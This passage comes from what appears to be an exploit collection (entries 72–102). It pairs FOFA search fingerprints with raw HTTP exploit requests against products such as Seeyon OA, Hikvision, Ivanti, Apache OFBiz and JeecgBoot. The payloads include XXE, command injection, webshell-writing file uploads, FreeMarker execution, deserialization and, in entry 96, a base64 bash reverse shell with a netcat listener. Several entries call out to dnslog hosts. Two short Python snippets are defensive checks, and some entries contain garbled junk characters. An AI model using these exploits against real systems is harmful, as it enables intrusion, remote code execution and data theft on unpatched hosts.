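request; simulated_sender() is a stand-in used by the demo."""
import hashlib
import time
from typing import Callable


def mssql_md5_marker(seed: str) -> str:
    """Hex digest that HashBytes('MD5', seed) yields on MSSQL. The probes wrap
    it in fn_varbintohexstr / fn_sqlvarbasetostr, so a vulnerable response
    carries 0x<this hex>; matching 32 hex chars is a low-false-positive oracle."""
    return hashlib.md5(seed.encode("utf-8")).hexdigest()


def confirm_hash_oracle(body: str, seed: str) -> bool:
    """True when the response body echoes the MD5 of the injected seed
    (entry 58 injects 123456, entry 66 injects 102103122)."""
    return mssql_md5_marker(seed) in body.lower()


def confirm_time_based(send: Callable[[str], None], delay_seconds: int = 5,
                       rounds: int = 2, tolerance: float = 1.0) -> bool:
    """Timing confirmation for the WAITFOR DELAY probes. Each round measures a
    benign value first, then the probe, and requires the probe to be slower by
    roughly delay_seconds. Every round must agree: one slow reply is not evidence."""
    benign = "1"
    probe = f"1';WAITFOR DELAY '0:0:{delay_seconds}'--"
    for _ in range(rounds):
        t0 = time.monotonic()
        send(benign)
        baseline = time.monotonic() - t0
        t0 = time.monotonic()
        send(probe)
        slow = time.monotonic() - t0
        if slow - baseline < delay_seconds - tolerance:
            return False
    return True


def simulated_sender(delay: float) -> Callable[[str], None]:
    """Stand-in for a request function (demo only): behaves like a vulnerable
    backend by sleeping only when the parameter value contains WAITFOR."""
    def send(value: str) -> None:
        if "WAITFOR" in value.upper():
            time.sleep(delay)
    return send


if __name__ == "__main__":
    # Constructed response fragment, shaped like the 0x<hex> entry 58 returns.
    body = "<td>0x" + mssql_md5_marker("123456").upper() + "</td>"
    print("hash oracle:", confirm_hash_oracle(body, "123456"))
    # Timing oracle against a 1-second simulated backend instead of the 5 s probe.
    print("time oracle:", confirm_time_based(simulated_sender(1.0),
                                             delay_seconds=1, rounds=1, tolerance=0.5))
```

The hash oracle is preferred where the injection point reflects output: a 32-character digest that you chose cannot appear by accident, whereas timing needs several rounds and a baseline to be trustworthy.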
72. 致远 OA (Seeyon) getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%5D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

xmlValue decodes to a document whose DTD declares an external entity xxe pointing at file:///c:/windows/win.ini and references it from the VALUE field, so the file content is read while the signature XML is parsed.

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 M3-server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

/ N0 r$ L8 q; i. z75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE8 H5 Y- v9 ~' \! N. R. J7 K; |
FOFA:app="TELESQUARE-TLR-2005KSH"2 Y6 T: |' h. A
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1# t( w" @% ?8 g3 t6 n. m
Host: x.x.x.x3 Y0 ~0 w& z1 E2 A; j7 B7 _- ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 a& [( v- k! T5 z( U: o4 f
Connection: close
- D; I/ \0 q8 W4 G" \9 h/ P* W% RAccept: */*; i6 \# R' K+ \' j$ `5 ~# P7 ?4 |
Accept-Language: en6 U# T* C% _# u+ D+ q# R
Accept-Encoding: gzip/ ?+ q* h0 X+ G0 R. B" F& G
: p# w" K7 }6 B( }; P: ?
& i0 I0 k! u7 N% ]5 ~4 z6 VGET /cgi-bin/test28256.txt HTTP/1.13 k8 ]9 i# p, H! L x$ W& p- ^
Host: x.x.x.x
# ~1 S" g$ _$ D
[5 [6 U, O: z- Z8 o1 S2 E( n0 P+ P
76. 新开普 掌上校园 campus service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
"command": "GetFZinfo",
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

The UnitCode value is a FreeMarker template; Execute runs the command when the template is rendered. Then request the file it wrote:
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

Then request the uploaded file:
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达 天耀 software DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

Then request the written file:
GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视 (Uniview) video surveillance main-cgi password disclosure
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"
POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
"type": "0"
}

The sql field is rendered as a FreeMarker template before it is used; the DNS log callback confirms execution out of band.

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
Exploit request below; the body (PAYLOAD) writes a Godzilla webshell by path traversal in accountId.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Callback URL: http://x.x.x.x/userfiles/index.jsp

86. tosei (Japan) self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

The newline (%0a) terminates the ping command line and ${IFS} stands in for a space, so the injected cat runs even where spaces are filtered.

87. 安恒 明御 security gateway (DBAppSecurity) aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

Then request the written file: /jfhatuwe.php

88. 安恒 明御 security gateway (DBAppSecurity) aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

The type parameter decodes to a newline followed by echo '<?php echo "assdwdmpidmsbzoabahpjhnokiduw"; phpinfo(); ?>' >> /usr/local/webui/txzfsrur.php, so the injected command appends a PHP file under the web root. Then request the written file: /txzfsrur.php

89. 致远互联 FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

.js%70 decodes to .jsp, which defeats a filter that matches the literal extension; a vulnerable target reflects 24642 (111*222) in the response.

90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

The ..;/ segment is a path-parameter trick: the front-end authorization check sees a path under /center/api/task/, while the servlet container strips the ;-suffix and resolves the request to /center/api/orgManage/v1/orgs/download.

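Entries 63, 80, 85, 87 and 91 are all the same defect: a client-supplied file name is joined to a server directory without canonicalisation, so ../ (or, in entry 91, a ..;/ path-parameter segment that the authorization layer does not recognise) escapes the intended directory. The check below is an added example, not code from the original article or from any of the products; it decodes the value the way a container would, strips path parameters, normalises the result and reports whether it leaves the base directory. The base directories in the demo are assumed values chosen to illustrate the check, not the real install paths of those products.

```python
"""Path-traversal canonicalisation for the file-read/file-write entries above
(63, 80, 85, 87, 91). Added example, not from the original article; the base
directories used in the demo are assumptions, not the products' real paths."""
import posixpath
from urllib.parse import unquote


def canonical_request_path(raw: str, max_decode_rounds: int = 3) -> str:
    """Decode repeatedly (double-encoding such as %252e%252e is common), drop
    the ;param part of every segment (entry 91's /..;/ becomes a plain ..
    segment once the container strips path parameters), then collapse . and
    .. segments with posixpath.normpath."""
    path = raw
    for _ in range(max_decode_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    segments = [segment.split(";", 1)[0] for segment in path.split("/")]
    return posixpath.normpath("/".join(segments))


def resolves_outside(base_dir: str, user_path: str) -> bool:
    """True when a client-supplied file name would land outside base_dir.
    An absolute name counts as outside: os.path.join(base, '/etc/passwd')
    discards base entirely, which is how several of these bugs are reached."""
    base = posixpath.normpath(base_dir) + "/"
    canon = canonical_request_path(user_path)
    if canon.startswith("/"):
        return True
    target = posixpath.normpath(posixpath.join(base, canon))
    return not (target + "/").startswith(base)


if __name__ == "__main__":
    cases = [  # (entry, assumed base directory, value exactly as sent in the request)
        ("63 IP-guard path=", "/ipg/appr/data", "..%2Fconfig.ini"),
        ("80 DesignReportSave report=", "/webapps/app/report", "../xykqmfxpoas.jsp"),
        ("85 SysAid accountId=", "/opt/sysaid/accounts", "../../../tomcat/webapps"),
        ("87 aaa_local_web_preview suffix=", "/usr/local/webui/tmp", "/../../../jfhatuwe.php"),
        ("91 orgs/download fileName=", "/opt/export", "../../../../../../../etc/passwd"),
        ("benign upload name", "/opt/export", "2024/report.pdf"),
    ]
    for entry, base, value in cases:
        print(f"{entry:35} outside={resolves_outside(base, value)!s:5} {value}")
    # The route the container actually serves for entry 91's request path:
    print(canonical_request_path("/center/api/task/..;/orgManage/v1/orgs/download"))
```

Run the canonical form, not the raw string, through any allow-list or authorization check; matching on the raw path is exactly what the ..;/ and %2F variants are designed to slip past.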
92. 海康威视运行管理中心session命令执行& L5 g' s# A& ^, }
Fastjson命令执行, l& k6 |6 I1 u: c) x
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76", @+ U7 s* F/ [( R8 p6 [! f4 R
POST /center/api/session HTTP/1.1
8 H6 q7 S/ F; V3 hHost:
; n" m$ V. M, H: @Accept: application/json, text/plain, */*" Q$ X" O2 K( Y* I- y6 m1 A+ k
Accept-Encoding: gzip, deflate
0 g3 E+ L3 g/ V Z* o( l: dX-Requested-With: XMLHttpRequest% d4 c% |4 y- z" t1 t' o
Content-Type: application/json;charset=UTF-8. L$ A, W6 f, P- m) L: |, H+ p0 C
X-Language-Type: zh_CN
3 l8 V$ a# G8 K) s+ yTestcmd: echo test8 R: C9 J9 X: @( m$ T! K5 _* U' w* y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36+ I- R% ?, M2 d# \* m
Accept-Language: zh-CN,zh;q=0.9+ P! _: k9 O" x- K( O# u
Content-Length: 5778
# x7 x4 V8 K' c( e: L! o I5 @
5 L5 R6 E' e7 M' D; V6 jPAYLOAD
$ f& W2 e6 E& ~9 a1 W8 @- b) J% e: V3 d( G2 m6 g
1 _2 O! N) g. C k8 x
93. 奇安信 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

Then request the uploaded file:
GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. 奇安信 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Then request the uploaded file:
GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (Yingkeshi) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

